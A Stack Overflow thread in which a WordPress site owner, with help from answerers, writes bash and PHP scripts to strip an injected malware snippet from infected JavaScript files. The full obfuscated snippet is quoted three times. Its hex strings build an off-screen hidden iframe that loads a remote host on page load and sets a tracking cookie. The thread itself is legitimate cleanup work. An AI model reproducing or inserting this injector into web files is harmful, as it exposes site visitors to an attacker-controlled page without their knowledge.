# How to remove a string in a directory recursively using fgrep | sed

Tags: bash, sed, grep

I have shell script:

```
#! /bin/bash

clear

SEARCH='/*236499a9e0b11c0dc3eecf5cf751a097*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28
\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E
\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62
\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A
\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E
\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var _0x10b1x5= new Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&
&_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else {return false};}function _0x10b1x6(_0x10b1x2){var _0x10b1x3= new RegExp(_0x10b1x2+_0xf19b[8]);var _0x10b1x4=_0x
10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else {return false};return _0x10b1x4[1]?_0x10b1x4[1]:false;}var _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_
0xf19b[11],_0xf19b[12],1);var _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var _0x10b1x9=1380;var _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1
0b1x8);};};
/*236499a9e0b11c0dc3eecf5cf751a097*/'

REPLACE=""

fgrep -rl $SEARCH . | xargs sed -i 's/$SEARCH/$REPLACE/g'

fgrep -rl $SEARCH .

echo "Finished replacements"
```

What I want to do is search for a string, that's actually malware code, and remove it using fgrep and sed. I know that fgrep -rl $SEARCH works, and returns all the files that contain the string. But it returns the shell script also. Here's a list with a few files that match the search criteria.

```
./wp-includes/js/heartbeat.min.js
./wp-includes/js/crop/cropper.js
./wp-includes/js/thickbox/thickbox.js
./wp-includes/js/admin-bar.min.js
./findandreplace.sh
```

Another thing is that there's something wrong with the sed part, because a it returns some errors:

```
grep: var: No such file or directory
grep: _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28: No such file or directory
grep: \x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E: No such file or directory
grep: \x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62: No such file or directory
grep: \x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A: No such file or directory
grep: \x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E: No such file or directory
grep: \x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function: No such file or directory
grep: _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var: No such file or directory
grep: _0x10b1x5=: No such file or directory
grep: new: No such file or directory
grep: Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&: No such file or directory
grep: &_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else: No such file or directory
grep: {return: No such file or directory
grep: false};}function: No such file or directory
grep: _0x10b1x6(_0x10b1x2){var: No such file or directory
grep: _0x10b1x3=: No such file or directory
grep: new: No such file or directory
grep: RegExp(_0x10b1x2+_0xf19b[8]);var: No such file or directory
grep: _0x10b1x4=_0x: No such file or directory
grep: 10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else: No such file or directory
grep: {return: No such file or directory
grep: false};return: No such file or directory
grep: _0x10b1x4[1]?_0x10b1x4[1]:false;}var: No such file or directory
grep: _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_: No such file or directory
grep: 0xf19b[11],_0xf19b[12],1);var: No such file or directory
grep: _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var: No such file or directory
grep: _0x10b1x9=1380;var: No such file or directory
grep: _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1: No such file or directory
grep: 0b1x8);};};: No such file or directory
grep: /*236499a9e0b11c0dc3eecf5cf751a097*/: No such file or directory
grep: var: No such file or directory
grep: _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28: No such file or directory
grep: \x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E: No such file or directory
grep: \x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62: No such file or directory
grep: \x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A: No such file or directory
grep: \x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E: No such file or directory
grep: \x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function: No such file or directory
grep: _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var: No such file or directory
grep: _0x10b1x5=: No such file or directory
grep: new: No such file or directory
grep: Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&: No such file or directory
grep: &_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else: No such file or directory
grep: {return: No such file or directory
grep: false};}function: No such file or directory
grep: _0x10b1x6(_0x10b1x2){var: No such file or directory
grep: _0x10b1x3=: No such file or directory
grep: new: No such file or directory
grep: RegExp(_0x10b1x2+_0xf19b[8]);var: No such file or directory
grep: _0x10b1x4=_0x: No such file or directory
grep: 10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else: No such file or directory
grep: {return: No such file or directory
grep: false};return: No such file or directory
grep: _0x10b1x4[1]?_0x10b1x4[1]:false;}var: No such file or directory
grep: _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_: No such file or directory
grep: 0xf19b[11],_0xf19b[12],1);var: No such file or directory
grep: _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var: No such file or directory
grep: _0x10b1x9=1380;var: No such file or directory
grep: _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1: No such file or directory
grep: 0b1x8);};};: No such file or directory
grep: /*236499a9e0b11c0dc3eecf5cf751a097*/: No such file or directory
```

After this, the script gets modified:

```
fgrep -rl $REPLACE . | xargs sed -i 's/$REPLACE/$REPLACE/g'

fgrep -rl $REPLACE .
```

So there's actually 3 problems:

1. The script matches the search criteria (How can I exclude it ?).
2. How to use correctly grep and sed.
3. The script get's modified by itself I guess.

Hope I was clear enough. Thanks =)

Answer (score 0, accepted):

Well, after @miken32's answer, and since I'm more familiar with php, I ended up with this:

```
#! /opt/php56/bin/php
<?php

$searchpattern='/*236499a9e0b11c0dc3eecf5cf751a097*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28
\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E
\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62
\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A
\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E
\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var _0x10b1x5= new Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&
&_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else {return false};}function _0x10b1x6(_0x10b1x2){var _0x10b1x3= new RegExp(_0x10b1x2+_0xf19b[8]);var _0x10b1x4=_0x
10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else {return false};return _0x10b1x4[1]?_0x10b1x4[1]:false;}var _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_
0xf19b[11],_0xf19b[12],1);var _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var _0x10b1x9=1380;var _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1
0b1x8);};};
/*236499a9e0b11c0dc3eecf5cf751a097*/';

$escaped_search = escapeshellarg($searchpattern);

$cmd = "grep -Frl $escaped_search .";

exec($cmd, $files);

$iter = 0;

foreach ($files as $file) {
    if (basename($file) !== basename(__FILE__)) {
        $iter++;
        $filecontents = file_get_contents($file);
        $filecontents = preg_replace("/(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)[\s\S]*(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)/", '', $filecontents);      
        file_put_contents($file, $filecontents);
    }
}

print("for count: $iter") . PHP_EOL;

$count = exec("fgrep -lr $escaped_search . | wc -l");

print("grep count: $count") . PHP_EOL;
```

I think the grep part could be optimized with a regular expression too, 
something like this:

```
fgrep -rl '(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)[\s\S]*(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)' .
```

But I dint' try it, so I don't know for sure.

A better way to recover from this kind of malware would be to use a backup, but In my case this wasn't possible, so I opted for the search/replace strategy.

Thanks for all the help !!

Answer (score 1):

Perhaps changing your script this way will help you,

```
for i in $(fgrep -rl --exclude='*.sh' $REPLACE .); do sed -i "s|${SEARCH}|${REPLACE}|g" "$i"; done;
```

Here I used `--exclude` to exclude shell scripts from targeted search and then ran it in a for loop so we can catch each file name and replace the searched material.

Comment: Could you just exclude $0 from the search?

Comment: I don't get you @miken32 what do you meant by exclude $0 from search??

Comment: $0 refers to the name of the script, so exclude it instead of all *.sh files.

Comment: No luck, this is what I get:

grep: var: No such file or directory
grep: _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28: No such file or directory
"some other stuff"

Comment: and this : 
grep: /*236499a9e0b11c0dc3eecf5cf751a097*/: No such file or directory
sed: -e expression #1, char 38: unterminated `s' command
sed: -e expression #1, char 38: unterminated `s' command
sed: -e expression #1, char 38: unterminated `s' command

Comment: what if there is more shell scripts containing copy of that string @miken32 how you gonna exclude them?

Comment: @AndresZapata is your shell script still getting edited??

Comment: @Skynet no, but I still have the other two problems.

Comment: Well your `fgrep` is now running ok as per your criteria check it alone @AndresZapata the only problem which is remains is replacing.

Comment: Let us [continue this discussion in chat](http://chat.stackoverflow.com/rooms/94383/discussion-between-skynet-and-andres-zapata).

Answer (score 0):

So, this is going to be enormously complicated because your search text, in addition to being on multiple lines, also contains characters that are special in regular expressions (eg `*`) as well as quotes. If you're not philosophically committed to using bash and sed, here's something that will work:

```
#! /usr/bin/php
<?php
$searchpattern='/*236499a9e0b11c0dc3eecf5cf751a097*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28
\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E
\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62
\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A
\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E
\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var _0x10b1x5= new Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&
&_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else {return false};}function _0x10b1x6(_0x10b1x2){var _0x10b1x3= new RegExp(_0x10b1x2+_0xf19b[8]);var _0x10b1x4=_0x
10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else {return false};return _0x10b1x4[1]?_0x10b1x4[1]:false;}var _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_
0xf19b[11],_0xf19b[12],1);var _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var _0x10b1x9=1380;var _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1
0b1x8);};};
/*236499a9e0b11c0dc3eecf5cf751a097*/';

$escaped_search = escapeshellarg($searchpattern);

$cmd = "grep -Frl $escaped_search .";

exec($cmd, $files);

foreach ($files as $file) {
    if (basename($file) !== basename(__FILE__)) {
        $filecontents = file_get_contents($file);
        $filecontents = str_replace($searchpattern, "", $filecontents);
        file_put_contents($file, $filecontents);
    }
}
```

Comment: error:
sh: -c: line 6: syntax error near unexpected token `('
sh: -c: line 6: `\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var _0x10b1x5= new Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&'

Comment: Worked fine for me. What version PHP do you have?

Comment: I changed the version, but nothing happens. php56

Comment: This is what I have:
escaped_search = escapeshellarg($searchpattern);

$cmd = "grep -Frl $escaped_search .";

exec($cmd, $files);

$iter = 0;

foreach ($files as $file) {
    if (basename($file) !== basename(__FILE__)) {
     $iter++;
        $filecontents = file_get_contents($file);
        $filecontents = str_replace($searchpattern, "", $filecontents);
        file_put_contents($file, $filecontents);
    }
}

print("for count: $iter") . PHP_EOL;

$count = exec("fgrep -lr $escaped_search . | wc -l");

print("count: $count") . PHP_EOL;